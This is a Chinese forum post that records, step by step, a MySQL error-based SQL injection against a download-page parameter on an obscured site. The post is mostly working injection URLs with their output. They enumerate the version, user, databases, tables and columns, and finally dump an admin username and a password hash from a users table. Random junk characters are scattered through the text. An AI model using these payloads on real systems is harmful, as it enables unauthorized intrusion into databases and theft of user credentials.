http://www.wooyun.org/bugs/wooyun-2010-01666) j# r; ^ N8 ?6 h/ J I& i
v) e1 N! I6 v之前想找个测试 没想到这有 可以测试下做个记录而已 - N' Q9 F. |# q7 ^
6 {8 u/ E) R9 A! ehttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0030 y0 v- \3 o$ |
5 ^# F6 ^' k! H4 q/data0/htdocs/leqi_new/app/myapp.php9 Y5 e$ x1 U' x
8 v1 K4 X1 [* K6 V1 x 或者) I3 |4 N: N- X4 {0 d8 B
/ g' f6 k4 \# J& b0 w( m* Q" j/**********version()**********/ 5.1.49-log
2 A. y* {+ {( F# X% Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) R/ @" J+ {8 Z- |; }% d: F( S: q, `$ g4 T2 S: s" |& \
/**********user()**********/
4 A# O5 X, n) M9 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) H1 t9 ]7 T( e, O% _
* V+ c- a0 A7 U) @* L
/**********database()**********/ leqi/ [; e2 v. Y1 f0 E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# t+ i/ V! u6 Q; h2 I5 b% Y- t1 a) L& C' z |$ E) Y/ K, d! w
/**********limit依次递归爆库**********/
}2 u8 J: A# F$ {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 r$ C, S1 I7 ^. F
information_schema
* {6 ^2 M9 {( |% Z, Z7 E1 khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% `* V! ^6 [( qleqi1 H! s# C# d* x; _ B# h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 l y4 ]3 }9 M4 q) e
test5 _8 `& G2 {7 y3 L+ V# G
' y1 ]( Z; S; v
/**********limit依次递归爆表名**********/3 ?. ]; e$ d$ D! A6 n# q0 X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 H7 h% ~5 K, X8 yusers8 N" J, f% Z9 U9 f
6 ]! F7 g3 f( u9 `/**********limit依次递归爆字段名**********/9 Q. {! q7 G/ S2 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 K' t X& x8 p7 u* a. S& Kuser_id,username,nickname,passwd,group_id
0 @$ C% F8 k! ?5 C; ^: N2 s$ h2 ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, h1 y# @; C& A* ]( M% H+ E; O/wapc/5000_0005_003
- j! Q0 Y6 u4 L% n9 q( B11 21( E! F: ~& w. j3 N. |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" g! }4 }# @. @% s& h" b
/wapc/5000_0005_003" C2 {- Z" y+ Y* e2 E2 Y
11 341 351 361& o x0 |' Z! H' i$ F) A7 ?
/**********爆数据**********/0 U4 f+ ]4 _& r3 d7 z. [# x" r2 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' m% p4 S. q9 z8 i6 j8 Eadmin
" O% W0 y$ y+ Z, K0 D9 u- Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' N1 R L, P3 M
6a8b4574ca231eb8bd52764d4978ffcd
/ u2 q" p: K) h( S' U. d$ G |
! i3 X! @$ K3 ^ k5 u
2 \, [0 [8 B3 H I |
发表于 2012-9-13 17:52:09
收藏
支持
反对